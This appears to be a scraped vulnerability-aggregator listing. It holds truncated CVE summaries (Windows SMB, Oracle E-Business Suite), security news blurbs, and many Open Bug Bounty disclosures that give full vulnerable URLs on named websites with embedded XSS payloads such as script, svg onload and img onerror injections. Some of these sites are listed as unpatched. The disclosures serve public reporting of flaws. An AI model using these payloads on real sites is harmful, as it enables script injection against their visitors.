Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability

Description Microsoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. Technologies Affected Microsoft Windows 10 Version 1607 for 32-bit...

theifp.ca XSS vulnerability

Vulnerable URL: http://www.theifp.ca/search/allarticles/?q=%3cimg%20src%3dx%20onerror%3dprompt%2fopenbugbounty%2f%3e=haltonhills-on=datedesc Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1070658 VIP website...

orangeville.com XSS vulnerability

Vulnerable URL: http://www.orangeville.com/search/allarticles/?q=%3cimg%20src%3dx%20onerror%3dprompt%2fopenbugbounty%2f%3e=orangeville-on=datedesc Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 551394 VIP websit...

Dahua Patching Backdoor in DVRs, IP Cameras

A California firm is rushing to patch a backdoor that apparently exists in a host of DVRs, CCTV and IP cameras it manufactures. Engineers with Dahua Technology USA began pushing firmware updates for the issue on Monday, something the company says stems from “a small piece of code.” The company sa...

churchhistorianspress.org XSS vulnerability

Vulnerable URL: https://www.churchhistorianspress.org/george-q-cannon/search?q=%27%22%2F%3E%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2FOPENBUGBOUNTY%2F%29%3C%2Fscript%3E Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Ran...

sigmacoatings.co.za XSS vulnerability

Vulnerable URL: http://www.sigmacoatings.co.za/search.php?search=asdas" Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 15:26 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 9810386 VIP website status:| No Che...

galleriez.org XSS vulnerability

Vulnerable URL: http://www.galleriez.org/search.php?action=search=%22%3E%3C%2Ftitle%3E%27%3E%3B%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FOPENBUGBOUNTY%2F%29%3E=and Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:...

icecubechandigarh.com XSS vulnerability

Vulnerable URL: http://icecubechandigarh.com/showproducts.php?cid=6!" Details: Description| Value ---|--- Patched:| Yes, at 25.11.2017 Latest check for patch:| 25.11.2017 10:31 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1420353 VIP website status:| No Check...

sandbox.bluesnap.com XSS vulnerability

Vulnerable URL: https://sandbox.bluesnap.com/jsp/buynow.jsp?contractId=2154142=500.00&custom1;=hello%20world%3C!%27/!%22/!%27/%22/--!%3E%3CInput/Autofocus/%0D/Onfocus=confirmOPENBUGBOUNTY//%3E%3CSvg%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:|...

Zimperium Program Buys Exploits for Patched Mobile Vulnerabilities

Mobile security company Zimperium said Tuesday that it will start buying exploits, but in a departure from most other programs, it will not be buying zero-days. The company’s N-Days Exploit Acquisition Program will pay researchers from a pool of $1.5 million for exploits targeting vulnerabilities...

hexal.de XSS vulnerability

Vulnerable URL: http://www.hexal.de/praeparate/arzneimittel.php?fachkreise=false Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 214156 VIP website status:| No Check hexal.de SSL connection:| Grade: A Coordinated...

CVE-2017-3246

Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite subcomponent: Patching. Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure...

Design/Logic Flaw

Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite subcomponent: Patching. Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure...

Design/Logic Flaw

Vulnerability in the Oracle Applications DBA component of Oracle E-Business Suite subcomponent: Patching. Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where...

CVE-2017-3246

The CVE-2017-3246 entry refers to a vulnerability in the Oracle Application Object Library (Patching) within Oracle E-Business Suite. Affected supported versions include 12.1.3, 12.2.3, 12.2.4, 12.2.5, and 12.2.6. The issue is described as easily exploitable by a high-privilege attacker who has l...

CVE-2017-3246

Vulnerability in the Oracle Application Object Library component of Oracle E-Business Suite subcomponent: Patching. Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure...

CVE-2017-3286

Vulnerability in the Oracle Applications DBA component of Oracle E-Business Suite subcomponent: Patching. Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where...

dermomarket.com XSS vulnerability

Vulnerable URL: http://www.dermomarket.com/index.php?do=catalog/results=%3C/script%3E%3Cscript%3Ealert%28%22OPENBUGBOUNTY%22%29%3C/script%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 14:21 GMT Vulnerability type:| XSS Vulnerability status...

About the security content of Safari 9.1.1 - Apple Support

For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website. For information about...

maison-domotique.fr XSS vulnerability

Vulnerable URL: http://maison-domotique.fr/rechercher.php?rechercher=%22%3E%3C/title%3E%27%3E;%3C/script%3E%3Csvg/onload=alert/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...